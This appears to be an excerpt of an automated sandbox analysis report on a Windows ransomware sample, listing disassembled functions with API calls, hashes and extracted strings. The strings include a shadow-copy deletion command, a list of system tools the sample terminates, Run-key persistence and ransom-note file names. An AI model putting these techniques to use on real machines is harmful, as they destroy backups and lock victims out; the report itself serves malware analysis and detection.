                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ad7dc59bcdc243daddd12a4e556da9772fa56c9add03a9eb50e22582945fae62
                                                                                                                            • Instruction ID: 74f2a6b067ba9b5df15a265d400abec7ddf434a92b89b8105a08d4b769df93d9
                                                                                                                            • Opcode Fuzzy Hash: ad7dc59bcdc243daddd12a4e556da9772fa56c9add03a9eb50e22582945fae62
                                                                                                                            • Instruction Fuzzy Hash: 8641AF71A005099FCB18DF69D5806AEB7A1FF88310F14C27FE81ADB345D7B5E9918B88
                                                                                                                            Function 0040E4F0 Relevance: .1, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 433edc3c10cec55b81952da54c18d6ad22dafecf70e64e00cc1fd14257b5f70f
                                                                                                                            • Instruction ID: 31143e65238efc256e104233d484f113263112f08ee0aa5f57d2e6602a608dab
                                                                                                                            • Opcode Fuzzy Hash: 433edc3c10cec55b81952da54c18d6ad22dafecf70e64e00cc1fd14257b5f70f
                                                                                                                            • Instruction Fuzzy Hash: 531106633194AC05EB1506BA9C3337A76864B8121BB4C84FBE08DC97CBDC7ED932529C
                                                                                                                            Function 004276BF Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004253FE), ref: 004276C7
                                                                                                                            • __mtterm.LIBCMT ref: 004276D3
                                                                                                                              • Part of subcall function 0042740C: DecodePointer.KERNEL32(00000004,00427835,?,004253FE), ref: 0042741D
                                                                                                                              • Part of subcall function 0042740C: TlsFree.KERNEL32(0000001D,00427835,?,004253FE), ref: 00427437
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(00000000,00000000,774EB15F,?,00427835,?,004253FE), ref: 0042A3A8
                                                                                                                              • Part of subcall function 0042740C: _free.LIBCMT ref: 0042A3AB
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(0000001D,774EB15F,?,00427835,?,004253FE), ref: 0042A3D2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,004253FE), ref: 004276E9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,004253FE), ref: 004276F6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,004253FE), ref: 00427703
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree,?,004253FE), ref: 00427710
                                                                                                                            • TlsAlloc.KERNEL32(?,004253FE), ref: 00427760
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,004253FE), ref: 0042777B
                                                                                                                            • __init_pointers.LIBCMT ref: 00427785
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 00427796
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277A3
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277B0
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277BD
                                                                                                                            • DecodePointer.KERNEL32(00427590,?,004253FE), ref: 004277DE
                                                                                                                            • __calloc_crt.LIBCMT ref: 004277F3
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,004253FE), ref: 0042780D
                                                                                                                            • GetCurrentThreadId.KERNEL32(?,004253FE), ref: 0042781F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            • Opcode ID: 2c00df72389e25008aa3955e646ae281114fcde81ecd68603a9de3682211893b
                                                                                                                            • Instruction ID: 9b151dc2d0a7d3be963eb5d747ef86db4f4cbe53b6bb54432aefd0192dcc4281
                                                                                                                            • Opcode Fuzzy Hash: 2c00df72389e25008aa3955e646ae281114fcde81ecd68603a9de3682211893b
                                                                                                                            • Instruction Fuzzy Hash: 8D311C31A052219EDB15BB79BC087567FE9EF48770B58253BE610922B0DB789441CF9C
                                                                                                                            Function 0041E5B0 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 131sleepthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcsstr$Process$_memset$CloseCurrentEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr
                                                                                                                            • API String ID: 2119192008-1900680373
                                                                                                                            • Opcode ID: 89ca60488d02b286b04acbdc6676e419b78c43395621f2d75843c5e492fa1453
                                                                                                                            • Instruction ID: b41a84964e6ed2460d4e8ad48bc2fa2dce5e79e8a0c792882b117dd623cb1915
                                                                                                                            • Opcode Fuzzy Hash: 89ca60488d02b286b04acbdc6676e419b78c43395621f2d75843c5e492fa1453
                                                                                                                            • Instruction Fuzzy Hash: 5841E978600315AAFB24DB61DD85FEB33B8EF44705F4404A9EA04A6291EB749A84CF6D
                                                                                                                            Function 0041E609 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 108sleepthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcsstr$Process$_memset$CloseEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr
                                                                                                                            • API String ID: 1297472855-1900680373
                                                                                                                            • Opcode ID: 701ac55dfe7f533498592658e8ae118e4cd7fb6e1e472c66c4cc7391ab5134fe
                                                                                                                            • Instruction ID: 0a4d8f05a93888b46b05cfc5cbb2e96727153d1d6f06e26b6d14b9e59b0751ca
                                                                                                                            • Opcode Fuzzy Hash: 701ac55dfe7f533498592658e8ae118e4cd7fb6e1e472c66c4cc7391ab5134fe
                                                                                                                            • Instruction Fuzzy Hash: DB31C978600315AAFB24DB61DD85FEA3378DF44709F4404A5EB05B6181E7749684CF5D
                                                                                                                            Function 0041E150 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 112registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000000,00000000,00020006,00000000,0041D95E,00000000), ref: 0041E183
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 0041E19E
                                                                                                                            • RegFlushKey.ADVAPI32(0041D95E), ref: 0041E1AA
                                                                                                                            • RegCloseKey.ADVAPI32(0041D95E), ref: 0041E1B0
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E1D3
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 0041E206
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E20C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E212
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E235
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 0041E266
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E26C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E272
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue
                                                                                                                            • String ID: kL$ kL$EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                            • API String ID: 607596385-2765528930
                                                                                                                            • Opcode ID: a44a133e2775a9e93d4765aaa117b2f79ccb8b74e7474d24b08c2f61539c6c5e
                                                                                                                            • Instruction ID: 12093ea139c300f0673628f6e1cd767ac23dee0a1c6a9d0563fbbeeebcc6888b
                                                                                                                            • Opcode Fuzzy Hash: a44a133e2775a9e93d4765aaa117b2f79ccb8b74e7474d24b08c2f61539c6c5e
                                                                                                                            • Instruction Fuzzy Hash: F0316075B90314BAE728DB94CC86FAAB3B9EB5CB00F214559B700BB1D0D6F4BA40C758
                                                                                                                            Function 0041D210 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 99sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041D231
                                                                                                                            • _memset.LIBCMT ref: 0041D244
                                                                                                                            • _memset.LIBCMT ref: 0041D257
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041D270
                                                                                                                              • Part of subcall function 0041D1A0: _vsnwprintf.NTDLL ref: 0041D1CF
                                                                                                                            • _memset.LIBCMT ref: 0041D2E2
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 0041D337
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D350
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041D35E
                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0041D367
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041D376
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$ExecuteShell$CloseEnvironmentErrorHandleLastSleepVariable_vsnwprintf
                                                                                                                            • String ID: /c start "" "%s"$%s\system32\cmd.exe$<$@$DfC$windir
                                                                                                                            • API String ID: 3370961082-4193238480
                                                                                                                            • Opcode ID: c3e4274e274cfd2eb9d096d767df97df51c952df6807cfc6eb756e516c041e78
                                                                                                                            • Instruction ID: 9fd5859a90402e78b6874ceda3f8e209096e6d3a03dae52f113e5a618079a305
                                                                                                                            • Opcode Fuzzy Hash: c3e4274e274cfd2eb9d096d767df97df51c952df6807cfc6eb756e516c041e78
                                                                                                                            • Instruction Fuzzy Hash: 5A31A5F1E0021CA6DB20DB55DC45FDA73B8EB48704F4085AAE648E6181DB799AC4CFED
                                                                                                                            Function 0041D390 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 78sleepthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteShell_memset_strcat_s$CloseErrorExitHandleLastSleepThread
                                                                                                                            • String ID: <$@$delete $shadows /all /Quiet $xfC
                                                                                                                            • API String ID: 745248852-859559790
                                                                                                                            • Opcode ID: d365b7de738bec6b482e9685b861eebe7afb23725a0c7d70ce78bc4f28557df3
                                                                                                                            • Instruction ID: 9c1bbf38363198c24e56f9ed804daa07495aa1b6d26b64f44dc71bd627e4087d
                                                                                                                            • Opcode Fuzzy Hash: d365b7de738bec6b482e9685b861eebe7afb23725a0c7d70ce78bc4f28557df3
                                                                                                                            • Instruction Fuzzy Hash: 5E31A9B09002289BDB20DF61DC81FDE7778EB18744F41449AE248A7250D7B8AEC4CF98
                                                                                                                            Function 004133E0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 197fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004134DA
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00413555
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile_memset
                                                                                                                            • String ID: +M$.html$.txt$\restore_files_
                                                                                                                            • API String ID: 3830271748-1530502143
                                                                                                                            • Opcode ID: d09b1184c7a8454e68dfcebd0a0b01cc57f6a79f606d5f0b09e1a9284c8d9e2d
                                                                                                                            • Instruction ID: b0ebde83edd008dc97222ab2d2d2e2d3358175b2e1a9e19fbf5c8bd48a48a3a8
                                                                                                                            • Opcode Fuzzy Hash: d09b1184c7a8454e68dfcebd0a0b01cc57f6a79f606d5f0b09e1a9284c8d9e2d
                                                                                                                            • Instruction Fuzzy Hash: E6516A3160032065E725AF208C86FE77365EF28754F5002A6F744AB2C5E779AB84C79C
                                                                                                                            Function 0041E3F0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 134fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041E300: GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                              • Part of subcall function 0041E300: SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                              • Part of subcall function 0041E300: SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                              • Part of subcall function 0041E300: DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                              • Part of subcall function 0041E300: ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                              • Part of subcall function 0041E300: DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E4A2
                                                                                                                            • GetDIBits.GDI32 ref: 0041E4DB
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E4E4
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0041E522
                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 0041E53E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 0041E55B
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041E573
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041E57A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E581
                                                                                                                            • DeleteObject.GDI32(?), ref: 0041E595
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Object$CreateDeleteWrite$CompatibleReleaseSelect$BitmapBitsBuffersCloseColorFlushHandleModeText
                                                                                                                            • String ID: ($6
                                                                                                                            • API String ID: 666674223-4149066357
                                                                                                                            • Opcode ID: 06ac5d28294c8e6622ef96abb61ed0812d4c04e077a74d001cbdd98fdbf226e2
                                                                                                                            • Instruction ID: 06a2a779e1feef08f14fc2e11d98cd6d7394d97c17aae2770a884c198b9b7a13
                                                                                                                            • Opcode Fuzzy Hash: 06ac5d28294c8e6622ef96abb61ed0812d4c04e077a74d001cbdd98fdbf226e2
                                                                                                                            • Instruction Fuzzy Hash: F6414D71618340ABD310DFA4DD45B9FB7F8EFC9704F004A1EF68596290E7B499448BAB
                                                                                                                            Function 00401270 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 415COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004010A0: std::exception::exception.LIBCMT ref: 00401116
                                                                                                                              • Part of subcall function 004010A0: __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401514
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040152F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401573
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00401588
                                                                                                                            • std::exception::exception.LIBCMT ref: 0040171A
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040172F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401777
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040178C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: failed$4C$4C
                                                                                                                            • API String ID: 3728558374-858053814
                                                                                                                            • Opcode ID: 1708425a60af2b91427465b3e876a342997327ddb468002a55ec4e15827a5f46
                                                                                                                            • Instruction ID: 36413a6523f9bf71e860ab9fa8cf4e802c959e55f4098fbd293934a26d275bda
                                                                                                                            • Opcode Fuzzy Hash: 1708425a60af2b91427465b3e876a342997327ddb468002a55ec4e15827a5f46
                                                                                                                            • Instruction Fuzzy Hash: 0A029E70D002689BDB21CFA5CC80BDEBBB4BF59304F1485ABE405BB281D7B95A85CF95
                                                                                                                            Function 00401A20 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000003,\S-1-5-18\Software\msys\,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00401A59
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00401AE2
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401A81
                                                                                                                              • Part of subcall function 00402DE0: __strftime_l.LIBCMT ref: 00402DF2
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,Software\msys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401B10
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401B2A
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 00401B6A
                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00401B74
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00401BD5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CloseCreateQuery$Flush__strftime_l
                                                                                                                            • String ID: %X%X%X%X%X%X%X%X$Software\msys\$\S-1-5-18\Software\msys\
                                                                                                                            • API String ID: 1839477016-2754814859
                                                                                                                            • Opcode ID: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction ID: 9685e600e0c5b42de14bfeeca4ed7f4a10fcdf9f0481810e012af34b19a7429f
                                                                                                                            • Opcode Fuzzy Hash: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction Fuzzy Hash: 84410B717642A87AD710E7A5AC81F7A7BFC974DB01F10906AF640B61D1D2F8AB009B7C
                                                                                                                            Function 0041DC60 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DC8E
                                                                                                                            • CreateFileW.KERNEL32 ref: 0041DCEA
                                                                                                                            • WriteFile.KERNEL32(00000000,004BCE20,004BCE21,00000000,00000000), ref: 0041DD24
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041DD2D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DD30
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041DD83
                                                                                                                            • WriteFile.KERNEL32(00000000,004C0CA0,004C0CA1,?,00000000), ref: 0041DDB1
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,756F3475,?,0041DAE7), ref: 0041DDB4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DDB7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$BuffersCloseCreateFlushHandleWrite$_memset
                                                                                                                            • String ID: \RESTORE_FILES.HTML$\RESTORE_FILES.TXT
                                                                                                                            • API String ID: 914705027-2095582212
                                                                                                                            • Opcode ID: 18a3c64054919ee805ea0c3a475892a9df1bfefe8efc65d8eec9dfd060d6155a
                                                                                                                            • Instruction ID: 96bf19131e14ac19f3527533158f27ed193ecad63d9d7319e44fd025a00123c3
                                                                                                                            • Opcode Fuzzy Hash: 18a3c64054919ee805ea0c3a475892a9df1bfefe8efc65d8eec9dfd060d6155a
